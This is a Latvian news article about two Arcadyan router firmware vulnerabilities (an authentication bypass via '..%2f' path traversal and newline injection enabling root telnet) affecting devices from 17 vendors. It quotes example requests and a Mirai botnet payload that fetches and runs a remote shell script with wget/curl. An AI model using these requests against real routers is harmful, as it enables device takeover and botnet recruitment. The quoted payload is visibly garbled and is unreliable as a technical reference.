Mājas maršrutētāju neaizsargātība, kas ietekmē 17 ražotājus

Tīklā ir reģistrēts masveida uzbrukums mājas maršrutētājiem, kuru programmaparatūra izmanto HTTP servera ieviešanu no uzņēmuma Arcadyan. Lai iegūtu kontroli pār ierīcēm, tiek izmantota divu ievainojamību kombinācija, kas ļauj attālināti izpildīt patvaļīgu kodu ar root tiesībām. Problēma skar diezgan plašu ADSL maršrutētāju klāstu no Arcadyan, ASUS un Buffalo, kā arī ierīcēm, kas tiek piegādātas ar Beeline zīmoliem (problēma ir apstiprināta Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone un citi telekomunikāciju operatori. Tiek atzīmēts, ka problēma Arcadyan programmaparatūrā pastāv jau vairāk nekā 10 gadus un šajā laikā ir izdevies migrēt uz vismaz 20 ierīču modeļiem no 17 dažādiem ražotājiem.

Pirmā ievainojamība CVE-2021-20090 ļauj piekļūt jebkuram tīmekļa saskarnes skriptam bez autentifikācijas. Ievainojamības būtība ir tāda, ka tīmekļa saskarnē daži direktoriji, caur kuriem tiek sūtīti attēli, CSS faili un JavaScript skripti, ir pieejami bez autentifikācijas. Šajā gadījumā direktorijus, kuriem ir atļauta piekļuve bez autentifikācijas, pārbauda, ​​izmantojot sākotnējo masku. Programmaparatūra bloķē rakstzīmju “../” norādīšanu ceļos, lai dotos uz vecākdirektoriju, bet kombinācijas “..%2f” izmantošana tiek izlaista. Tādējādi ir iespējams atvērt aizsargātas lapas, sūtot pieprasījumus, piemēram, “http://192.168.1.1/images/..%2findex.htm”.

Otrā ievainojamība CVE-2021-20091 ļauj autentificētam lietotājam veikt izmaiņas ierīces sistēmas iestatījumos, nosūtot īpaši formatētus parametrus skriptam apply_abstract.cgi, kas nepārbauda, ​​vai parametros nav jaunas rindiņas rakstzīmes. . Piemēram, veicot ping operāciju, uzbrucējs var norādīt vērtību “192.168.1.2%0AARC_SYS_TelnetdEnable=1” laukā, kurā tiek pārbaudīta IP adrese, un skriptu, veidojot iestatījumu failu /tmp/etc/config/. .glbcfg, tajā ierakstīs rindu “AARC_SYS_TelnetdEnable=1”, kas aktivizē telnetd serveri, kas nodrošina neierobežotu komandu čaulas piekļuvi ar root tiesībām. Tāpat, iestatot parametru AARC_SYS, sistēmā var izpildīt jebkuru kodu. Pirmā ievainojamība ļauj palaist problemātisku skriptu bez autentifikācijas, piekļūstot tam kā “/images/..%2fapply_abstract.cgi”.

Lai izmantotu ievainojamības, uzbrucējam ir jāspēj nosūtīt pieprasījumu uz tīkla portu, kurā darbojas tīmekļa saskarne. Spriežot pēc uzbrukuma izplatības dinamikas, daudzi operatori atstāj piekļuvi savām ierīcēm no ārējā tīkla, lai atbalsta dienests vienkāršotu problēmu diagnostiku. Ja piekļuve saskarnei ir ierobežota tikai ar iekšējo tīklu, uzbrukumu var veikt no ārēja tīkla, izmantojot “DNS pārsaistīšanas” paņēmienu. Jau tagad tiek aktīvi izmantotas ievainojamības, lai savienotu maršrutētājus ar robottīklu Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Savienojums: aizveriet lietotāja aģentu: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_.212.192.241.7.ipaddress0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Avots: opennet.ru

Pievieno komentāru